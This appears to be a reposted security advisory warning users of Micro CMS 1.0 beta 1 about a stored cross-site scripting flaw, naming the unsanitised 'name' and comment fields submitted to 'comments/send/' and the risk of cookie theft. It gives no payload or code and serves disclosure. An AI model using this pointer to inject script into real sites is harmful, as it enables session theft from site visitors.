Micro CMS: Cross-site Scripting Vulnerability

Users of Micro CMS please be advised of a Cross-site Scripting vulnerability that has been identified.

To view this vulnerability, possible remedies, and others please check out the Security Advisories at Critical Watch (http://criticalwatch.com/support/security-advisories.aspx)

Amplify’d from www.criticalwatch.com

SecPod 1004: Micro CMS Cross-site Scripting

Affected Software: ------------------ Micro CMS 1.0 beta 1 and prior

Technical Description: ---------------------- Micro CMS is prone to a Persistent Cross-Site vulnerability because it fails to properly sanitize user-supplied input. Input passed via the 'name' parameter(also in text-area) in a comment section to "comments/send/" is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. This may allow the attacker to steal cookie-based authentication and to launch further attacks.

Read more at www.criticalwatch.com

 

See this Amp at http://amplify.com/u/dtrd